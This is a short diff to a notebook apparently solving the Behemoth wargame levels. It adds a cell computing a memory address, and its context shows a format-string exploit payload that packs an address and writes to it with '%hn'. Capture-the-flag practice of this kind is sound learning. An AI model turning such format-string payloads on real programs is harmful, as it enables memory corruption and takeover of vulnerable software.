--- a/Behemoth/behemoth.ipynb
+++ b/Behemoth/behemoth.ipynb
@@ -103,6 +103,26 @@
     "\n",
     "print(struct.pack(\"<I\", 0xFFFFBFBC) + b\"%65531d%5$hn\")"
    ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'0xffffd9a5'"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "hex(0xFFFFD161 + 512 + 1600 + 4)"
+   ]
   }
  ],
  "metadata": {
